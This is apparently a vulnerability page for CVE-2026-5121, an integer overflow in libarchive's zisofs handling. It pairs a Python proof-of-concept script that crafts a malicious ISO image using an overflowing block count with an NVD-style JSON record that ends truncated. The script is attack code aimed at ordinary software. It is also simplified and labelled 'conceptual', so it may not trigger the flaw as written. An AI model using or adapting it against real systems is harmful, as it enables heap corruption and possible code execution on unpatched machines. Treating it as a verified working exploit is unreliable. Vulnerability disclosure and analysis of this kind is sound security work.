CVE-2026-5121

import struct def create_malicious_iso(filename): """ Conceptual PoC for CVE-2026-5121 This script generates a crafted ISO9660 image intended to trigger an integer overflow in the zisofs block pointer allocation logic within libarchive on 32-bit systems. """ with open(filename, 'wb') as f: # 1. Write a dummy System Area (32768 bytes) f.write(b'\x00' * 32768) # 2. Write a simplified Primary Volume Descriptor (PVD) # Type 1 (PVD), Standard ID "CD001", Version 1 pvd = b'\x01' + b'CD001' + b'\x01' pvd += b'\x00' * (2048 - len(pvd)) f.write(pvd) # 3. Simulate Zisofs header/location # In a real exploit, this data would be placed where libarchive # expects the Zisofs block pointer table. # Seek to a hypothetical offset (simplified) f.write(b'\x00' * 2048) # "ziso" magic identifier (often used in zisofs) f.write(b'ziso') # Block size (e.g., 0x8000 is 32KB) f.write(struct.pack('<I', 0x8000)) # Number of blocks: Set to a value that causes integer overflow # on 32-bit systems when calculating allocation size. # Calculation in libarchive: count * 4 (size of pointer) # If count = 0x40000000, then 0x40000000 * 4 = 0 (overflow) # This results in malloc(0) or a very small buffer. malicious_block_count = 0x40000000 f.write(struct.pack('<I', malicious_block_count)) # Write dummy data to fill the file f.write(b'A' * 1024) print(f"[+] Crafted ISO file created: {filename}") print("[+] Attempting to trigger integer overflow in libarchive zisofs parsing.") if __name__ == "__main__": create_malicious_iso("cve_2026_5121_poc.iso")

{"cve": {"id": "CVE-2026-5121", "sourceIdentifier": "[email protected]", "published": "2026-03-30T08:16:18.780", "lastModified": "2026-05-21T04:16:31.343", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system."}, {"lang": "es", "value": "Se encontró un fallo en libarchive. En sistemas de 32 bits, existe una vulnerabilidad de desbordamiento de entero en la lógica de asignación de punteros de bloque zisofs. Un atacante remoto puede explotar esto al proporcionar una imagen ISO9660 especialmente diseñada, lo que puede llevar a un desbordamiento de búfer de pila. Esto podría permitir potencialmente la ejecución de código arbitrario en el sistema afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libarchive:libarchive:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A51945D-40D7-4C28-B0BB-774687265DCE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:10065", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:10097", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11768", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12071", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12274", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:13812", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14773", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14937", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:15087", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16008", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16009", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16030", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16174", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:17596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19724", "source": "[email protected]"}, {"url": "https://access.redh ... (truncated)